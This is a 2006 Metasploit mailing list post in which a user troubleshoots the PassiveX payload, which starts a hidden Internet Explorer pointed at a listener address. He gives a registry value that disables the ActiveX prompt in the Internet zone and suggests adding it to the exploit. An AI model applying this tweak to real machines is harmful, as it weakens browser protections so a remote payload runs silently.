Metasploit mailing list archives
Using the PassiveX payload
From: featuremeister at googlemail.com (Feature Meister)
Date: Fri, 5 May 2006 18:18:44 +0200
Hi, the dll does not get downloaded into %WINDIR%\Downloaded Program Files. After some more troubleshooting and debugging (with process explorer) I found out that the hidden IE is started with "...\iexplore.exe -new http://192.168.71.75:8000/. So I tried this one from a regular command line. Result: IE prevented an ActiveX Control from being loaded and executed automatically. Instead I was presented with a pop-up and the usual IE information bar. I then looked at the security settings of Internet-Zone. Besides "Automatic prompting for ActiveX controls" everythin was set so that the control would execute without asking. However the above setting was set to "Disable". I changed it to "Enable" according to the helpful help dialog ;-) and tried it again: it works! The required setting in HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 would be: "2201"=dword:00000000 probably this could be added to the actual exploit code? Cheers, Marco
Current thread:
- Using the PassiveX payload Feature Meister (May 04)
- Using the PassiveX payload mmiller at hick.org (May 04)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload mmiller at hick.org (May 05)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload mmiller at hick.org (May 05)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload mmiller at hick.org (May 04)